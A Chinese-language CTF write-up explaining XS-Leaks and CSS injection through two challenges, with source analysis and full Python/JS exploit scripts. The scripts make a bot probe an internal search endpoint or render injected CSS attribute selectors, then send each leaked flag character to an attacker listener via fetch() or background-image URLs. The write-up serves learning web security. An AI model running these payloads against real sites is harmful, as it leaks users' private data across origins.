Xs-Leaks
Xs-Leaks(Cross-site leaks),利用方式是通过侧信道反推从而获取具体信息
简单点说就是一种旁敲侧击的攻击方式,利用服务器运行时产生的一些非预期的信息来推测出详细的信息,比如时间和响应内容
sql 的盲注就是基于这个原理,时间盲注就是基于时间的 xsleaks,布尔盲注是基于响应内容的 xsleaks
原理没什么好说的,非常简单,难在题目的泄露方式上
通过具体的题目学习一下
internal_api[NCTF2024]
还没学过 rust,所以有的地方可能写的过于繁琐
数据库初始化
flag 在被插入数据库中时 hidden 被设为 false,而普通数据则是 true
// db.rs
pub fn init(db_name: String, json_name: String, flag: String) -> anyhow::Result<DbPool> {
// ...
// 插入普通评论,hidden 设为 false
for comment in comments {
conn.execute(
"INSERT INTO comments(content, hidden) VALUES(?, ?)",
params![comment, false],
)?;
}
// 插入 flag 时,hidden 设为 true
conn.execute(
"INSERT INTO comments(content, hidden) VALUES(?, ?)",
params![flag, true],
)?;
Ok(pool)
}搜索路由
LIKE+ format!("%{}%", query):SQL 的模糊查询语法。% 代表任意字符。假设 query 是 “f”,那么 SQL 语句实际上是查找“包含 f 的内容”。所以我们不需要知道完整的 flag,只需要猜测 flag 包含的片段即可得到结果
// db.rs
pub fn search(conn: DbConn, query: String, hidden: bool) -> anyhow::Result<Vec<String>> {
let mut stmt =
conn.prepare("SELECT content FROM comments WHERE content LIKE ? AND hidden = ?")?;
let comments = stmt
.query_map(params![format!("%{}%", query), hidden], |row| {// <---
Ok(row.get(0)?)
})?
.collect::<rusqlite::Result<Vec<String>>>()?;
Ok(comments)
}题目设置了两个搜索接口,一个 public,一个 private
// route.rs
pub async fn public_search(
Query(search): Query<Search>,
State(pool): State<Arc<DbPool>>,
) -> Result<Json<Vec<String>>, AppError> {
// ...
// 公开搜索时 hidden = false,无法查到 flag
let comments = db::search(conn, search.s, false)?;// <---
// ...
}
pub async fn private_search(
Query(search): Query<Search>,
State(pool): State<Arc<DbPool>>,
ConnectInfo(addr): ConnectInfo<SocketAddr>,
) -> Result<Json<Vec<String>>, AppError> {
// 检查访问者的 IP,必须是 Bot 的 IP
let bot_ip = tokio::net::lookup_host("bot:4444").await?.next().unwrap();
if addr.ip() != bot_ip.ip() {
return Err(anyhow!("only bot can access").into());
}
// 私有搜索时 hidden = true,可以查到 flag
let conn = pool.get()?;
let comments = db::search(conn, search.s, true)?;// <---
if comments.len() > 0 {
Ok(Json(comments))
} else {
Err(anyhow!("No comments found").into())
}
}看一下 private_search 的返回逻辑
// route.rs
if comments.len() > 0 {
Ok(Json(comments))//True
} else {
Err(anyhow!("No comments found").into())//False
}在 True 的时候会返回 200 状态码,至于为什么
关键在于 Json(comments) 这个结构体
Json 是 auxm::Json,用来处理 json 响应的包装器。在 axum 中,当有数据返回时,json 返回的状态码默认是 200
关于 ok 的作用,当函数返回 Ok(...) 时,axum 会提取 Ok 里面的内容并将其转换为 HTTP 响应
而在 False 的时候,由于路由函数的返回类型定义为 Result<..., AppError>,代码中的 .into() 会利用 rust 的 From 特性,自动将错误包装成 AppError 结构体。在捕获到 AppError 后,会自动调用它自定义的 IntoResponse 生成 http 响应,最终返回 500 状态码
// error.rs
(
StatusCode::INTERNAL_SERVER_ERROR, // 1. 强制设定状态码为 500
format!("Internal Server Error: {}", self.0), // 2. 强制返回纯文本内容
)利用思路
根据上面的分析,我们发现在在猜对字符的时候,返回的状态码为 200,并且返回的是 json 格式的数据,在猜错的时候返回的是 500,并且返回的是纯文本,于是便可以利用这一点来判断猜测的字符是否正确
那么该怎么猜测呢
既然 bot 能够访问我们提交的 url,那么就可以让 bot 去搜索 flag 并监听访问之后的事件,如果是 200 就说明猜测是对的,此时向监听的服务器上发送请求并带上猜测的字符,于是就能够拿到搜索到的 flag,然后将 flag 拼接到 current_flag 中带着这个继续探测下一位,最终能够拿到 flag
编写脚本
先梳理一下脚本编写的目的
1>提供一个恶意的页面,让 bot 搜索 flag 并在成功时访问我们监听的端口
2>在监听的端口收到请求时将 flag 拼接
3>在拼接后带着新的 current_flag 继续让 bot 搜索下一位
爱来自 gemini
这里要注意的点是必须要给 flag 提供第一位,因为这个匹配的模式是模糊查询,只要含有当前的字符判断就为 True,如果 current_flag 的初始值为空,那么拿到的第一位可能是 flag 中的任意一个值
还有就是在猜测的时候,因为 sql 的 like 语法中下划线 _ 是一个通配符,表示匹配任意单个字符,因此可能会导致某几位被替换为了_,如果想要避免的话可以在匹配完所有的字母数字和符号之后再用下划线进行一次匹配
import threading
import requests
import time
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import parse_qs, urlparse
# 配置部分
TARGET_URL = "http://127.0.0.1:8000" # 题目给出的目标地址
ATTACKER_IP = "host.docker.internal" # 你的服务器 IP,Bot 必须能访问到
ATTACKER_PORT = 8888 # 你的监听端口
# 当前已知的 Flag 部分,初始为空
known_flag = "f"
class ExploitHandler(BaseHTTPRequestHandler):
def do_GET(self):
global known_flag
parsed = urlparse(self.path)
# 1. Bot 回调接口:当 Bot 试出正确字符后,会访问这个接口告诉我们要拼接到 flag 上
if parsed.path == "/callback":
query = parse_qs(parsed.query)
if 'char' in query:
char = query['char'][0]
known_flag += char
print(f"[+] Found char: {char} -> Current Flag: {known_flag}")
self.send_response(200)
self.end_headers()
return
# 2. 攻击载荷接口:Bot 访问这个页面执行攻击代码
if parsed.path == "/exploit":
# 构造要测试的 payload
# 我们需要测试所有可能的字符。为了效率,这里让 JS 遍历字符集。
# 注意:internal search 的地址是 bot 容器内的地址,通常是 127.0.0.1 或 localhost 加题目端口
# 根据题目 main.rs,应用监听在 env HOST:PORT,通常 Bot 访问 localhost:80 即可(假设题目端口映射了)
# 或者题目提示了 Bot 访问 127.0.0.1:8080 等,需要根据实际情况调整 target_internal_url
# 假设题目运行在 8080 端口
target_internal_url = "http://web:8000/internal/search"
html_payload = f"""
<html>
<body>
<script>
const charset = "abcdefghijklmnopqrstuvwxyz0123456789}}_-";
const baseUrl = "{target_internal_url}";
const currentFlag = "{known_flag}";
async function check(char) {{
return new Promise((resolve) => {{
let s = document.createElement('script');
// 构造查询:已知部分 + 猜测字符
s.src = baseUrl + "?s=" + currentFlag + char;
// 核心逻辑:
// 如果触发 error (SyntaxError),说明返回的是 500 文本 -> 猜错了 (Match=False)
// 如果触发 onload,说明返回的是 200 JSON -> 猜对了 (Match=True)
// 注意:SyntaxError 通常会触发 window.onerror 而不是 script.onerror
// 但在跨域脚本中,为了简化,我们可以利用 script 标签的加载成功与否。
// 然而,HTTP 500 在某些浏览器下可能直接触发 script.onerror。
// 如果浏览器认为 500 的 text/plain 不是脚本,就会报错。
// 更加稳健的方法:利用全局错误捕获
let isMatch = true;
function errHandler() {{
isMatch = false; // 报错了,说明是 500 文本
}}
window.addEventListener('error', errHandler);
s.onload = () => {{
window.removeEventListener('error', errHandler);
resolve(isMatch);
}};
s.onerror = () => {{
// 如果网络层面的 500 导致加载失败,这里也会触发
window.removeEventListener('error', errHandler);
resolve(false);
}};
document.body.appendChild(s);
}});
}}
async function run() {{
for (let c of charset) {{
let result = await check(c);
if (result) {{
// 找到了!回传给攻击者服务器
fetch(`http://{ATTACKER_IP}:{ATTACKER_PORT}/callback?char=${{c}}`);
break;
}}
}}
}}
run();
</script>
</body>
</html>
"""
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(html_payload.encode())
return
def start_server():
server = HTTPServer(('0.0.0.0', ATTACKER_PORT), ExploitHandler)
print(f"[*] Server listening on {ATTACKER_PORT}")
server.serve_forever()
# 启动攻击者服务器线程
t = threading.Thread(target=start_server)
t.daemon = True
t.start()
# 循环发送 Report,直到拿全 Flag
# 每次循环,JS 拿到一个新字符后会通过 callback 更新 known_flag
# 下一次 Report 就会使用更新后的 known_flag 生成页面
while True:
if "}" in known_flag:
print(f"[!] Flag Captured: {known_flag}")
break
print(f"[*] Sending report for flag: {known_flag}...")
# 告诉 Bot 访问我们的 /exploit 页面
report_url = f"{TARGET_URL}/report"
exploit_url = f"http://{ATTACKER_IP}:{ATTACKER_PORT}/exploit"
try:
requests.post(report_url, data={"url": exploit_url})
except Exception as e:
print(f"Error sending report: {e}")
# 等待 Bot 执行完(Bot 会 sleep 30s,我们也等一会)
time.sleep(35)CSS Injection
css injection 是通过 css 代码探测网页中内容的方法,需要了解一下 css 相关的代码
例题:
跨站脚本攻击叫 CSS 还是 XSS[0xGame2025]
路由与过滤
看一下 app.js,用户提交的内容经过了 DOMPurify.sanitize 的处理。这意味着常规的 <script> 标签会被直接干掉,没法直接执行 JS 代码。
JavaScript
// app.js
app.post('/paste', requireLogin, (req, res) => {
// ...
let content = req.body.content;
let clean_content = DOMPurify.sanitize(content); // <--- 净化处理
notes.set(id, clean_content);
// ...
})虽然防住了 XSS,但 DOMPurify 在某些情况下是允许 <style> 标签的,或者允许 <svg> 内部包含 <style>,这就给了 CSS 注入可乘之机。
flag 位置
在 /view 路由中,只有当访问者是 admin 时,secret 变量才会是 FLAG。
// app.js
app.get('/view/:id', requireLogin, (req, res) => {
// ...
res.render('view', {
// ...
// 只有 admin 访问时,secret 才是 flag
secret: (req.session.user === 'admin') ? FLAG : 'Admin Channel',
// ...
});
})而这个 secret 最终被渲染到了 view.ejs 的 meta 标签的 content 属性里。
<head>
<meta readonly name="secret" content="<%- locals.secret %>">
</head>利用思路
既然不能用 js 读属性,那就用 css 读。原理是利用 css 的属性选择器。
css 允许我们根据属性的值来匹配元素,比如 input[value^="a"] 匹配 value 属性以 a 开头的元素。配合 background-image,如果匹配成功,浏览器就会去加载背景图片。我们可以把背景图片的 url 指向我们的服务器,这样就能收到回显了
那么该怎么利用呢
1.构造 Payload:因为 DOMPurify 的存在,直接写 style 可能会被过滤,可以用 <svg><style> 包裹来绕过。(这里只用 style 是不行的)
2.强制显示:meta 标签默认是不可见(display: none)的,不会触发背景图加载,所以在 css 里必须强制让它显示出来。
3.逐位爆破:和 sql 盲注一个道理。生成针对下一位所有字符的 css 规则,一旦匹配上,bot 就会访问我们设置的 url。
编写脚本
脚本的逻辑:
1.生成恶意 css payload,利用 content^= 探测下一位字符
2.通过 paste 路由提交并获取链接,利用 report 路由让 bot 访问
3.监听到请求后拼接 flag,开始下一轮
payload
写的第一版没法自动注入出来,只能注入出一个之后手动增加然后再开始,后面自动注入的写出来了,但是都是辛辛苦苦手打的,就留着了:)
#逐个字符盲注的脚本
import base64
import string
from email.charset import Charset
import re
import random
import urllib
import time
Target_Url = "http://175.27.251.122:10001"
Att_URL = "124.221.168.69"
Att_PORT = 11211
CHARSET = string.ascii_letters + string.digits + "_{}"
def generate_css_payload(ip,port,current_flag):
payload = "<svg><style><script>"
payload += 'head,meta[name="secret"] { display: block !important; visibility: visible !important; }'
payload += 'meta[name="secret"]{width: 10px; height: 10px; border: 1px solid black; }'
for char in CHARSET:
guess = current_flag + char
url = f"http://{ip}:{port}/exp/?Pr0={guess}"
payload += f'meta[name="secret"][content^="{guess}"]{{ background-image: url("{url}"); }}\n'
payload += '</script></style></svg>'
return payload
def exp(current_flag):
import requests
session = requests.session()
rand_name = ''.join(random.choices(string.ascii_letters + string.digits, k=8))
#登录
user_data = {"username": rand_name, "password": "123"}
session.post(f"{Target_Url}/register", data=user_data)
session.post(f"{Target_Url}/login", data=user_data)
print(f"用户登录成功:{rand_name}")
#提交 paste
paste_url = f"{Target_Url}/paste"
print(f"提交 paste: {paste_url}")
#获取网址
payload = generate_css_payload(Att_URL,Att_PORT,current_flag)
paste_data = {"content": payload}
r = session.post(paste_url, data =paste_data)
pattern = r'href="/view/(.*?)"'
match = re.search(pattern, r.text)
if match:
note_id = match.group(1)
bot_url = f"http://127.0.0.1:3000/view/{note_id}"
print("Bot_url:", bot_url)
else:
print("未找到 Note ID")
return
time.sleep(1)
report_data = {"url": bot_url}
text = session.post(f"{Target_Url}/report", data=report_data)
print(text.text)
if __name__ == "__main__":
current_flag = ""
exp(current_flag)
自动注入的脚本,手动写一遍还是比直接让 ai 写学到的东西多的多,需要写脚本的地方如果有时间最好还是要手写比较好
import base64
import string
from email.charset import Charset
from flask import Flask, request
import re
import random
import time
import threading
Target_Url = "http://3000-45d375b4-39a5-49d3-bbc7-5f88ed65d71f.challenge.ctfplus.cn"
Att_URL = "124.221.168.69"
Att_PORT = 11211
app = Flask(__name__)
CHARSET = string.ascii_letters + string.digits + "_{}-@!~"
current_flag = ""
def generate_css_payload(ip,port,current_flag):
payload = "<svg><style>"
payload += 'head,meta[name="secret"] { display: block !important; visibility: visible !important; }'
payload += 'meta[name="secret"]{width: 10px; height: 10px; border: 1px solid black; }'
for char in CHARSET:
guess = current_flag + char
url = f"http://{ip}:{port}/exp/?Pr0={guess}"
payload += f'meta[name="secret"][content^="{guess}"]{{ background-image: url("{url}"); }}\n'
payload += '</style></svg>'
return payload
def Att(current_flag):
import requests
session = requests.session()
rand_name = ''.join(random.choices(string.ascii_letters + string.digits, k=8))
#登录
user_data = {"username": rand_name, "password": "123"}
session.post(f"{Target_Url}/register", data=user_data)
time.sleep(3)
session.post(f"{Target_Url}/login", data=user_data)
time.sleep(3)
#print(f"用户登录成功:{rand_name}")
paste_url = f"{Target_Url}/paste"
#print(f"提交 paste: {paste_url}")
#获取网址
payload = generate_css_payload(Att_URL,Att_PORT,current_flag)
#print(payload)
paste_data = {"content": payload}
r = session.post(paste_url, data =paste_data)
pattern = r'href="/view/(.*?)"'
match = re.search(pattern, r.text)
if match:
note_id = match.group(1)
bot_url = f"http://localhost:3000/view/{note_id}"
#print("Bot_url:", bot_url)
else:
print("未找到 Note ID")
return
time.sleep(5)
report_data = {"url": bot_url}
text = session.post(f"{Target_Url}/report", data=report_data)
#print(text.text)
print("已提交,等待请求...")
@app.route('/exp/')
def get_flag():
global current_flag
char = request.args.get('Pr0')
current_flag = char
print("当前 flag: ", current_flag)
if char.endswith("}"):
print("获取完成,flag 为:", current_flag)
return "The End..."
threading.Thread(target=Att, args=(current_flag,)).start()
return "ok"
if __name__ == "__main__":
def Start_Att():
time.sleep(3)
Att(current_flag)
threading.Thread(target=Start_Att).start()
app.run(host='0.0.0.0', port=Att_PORT, threaded=True)